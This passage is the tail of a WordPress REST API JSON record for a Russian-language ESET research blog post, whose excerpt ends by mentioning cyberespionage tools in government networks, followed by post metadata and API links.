\u0438\u043d\u0441\u0442\u0440\u0443\u043c\u0435\u043d\u0442\u043e\u0432 \u043a\u0438\u0431\u0435\u0440\u0448\u043f\u0438\u043e\u043d\u0430\u0436\u0430 \u0432 \u0441\u0435\u0442\u044f\u0445 \u043f\u0440\u0430\u0432\u0438\u0442\u0435\u043b\u044c\u0441\u0442\u0432\u0435\u043d\u043d\u044b\u0445 \u0443\u0447\u0440\u0435\u0436\u0434\u0435\u043d\u0438\u0439<\/p>\n","protected":false},"author":5,"featured_media":8874,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"_acf_changed":false,"footnotes":""},"categories":[2891],"tags":[],"class_list":["post-8880","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-issledovaniya-eset"],"acf":[],"amp_enabled":true,"_links":{"self":[{"href":"https:\/\/blog.eset.ee\/et\/ru\/wp-json\/wp\/v2\/posts\/8880","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/blog.eset.ee\/et\/ru\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/blog.eset.ee\/et\/ru\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/blog.eset.ee\/et\/ru\/wp-json\/wp\/v2\/users\/5"}],"replies":[{"embeddable":true,"href":"https:\/\/blog.eset.ee\/et\/ru\/wp-json\/wp\/v2\/comments?post=8880"}],"version-history":[{"count":1,"href":"https:\/\/blog.eset.ee\/et\/ru\/wp-json\/wp\/v2\/posts\/8880\/revisions"}],"predecessor-version":[{"id":9597,"href":"https:\/\/blog.eset.ee\/et\/ru\/wp-json\/wp\/v2\/posts\/8880\/revisions\/9597"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/blog.eset.ee\/et\/ru\/wp-json\/wp\/v2\/media\/8874"}],"wp:attachment":[{"href":"https:\/\/blog.eset.ee\/et\/ru\/wp-json\/wp\/v2\/media?parent=8880"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/blog.eset.ee\/et\/ru\/wp-json\/wp\/v2\/categories?post=8880"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/blog.eset.ee\/et\/ru\/wp-json\/wp\/v2\/tags?post=8880"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}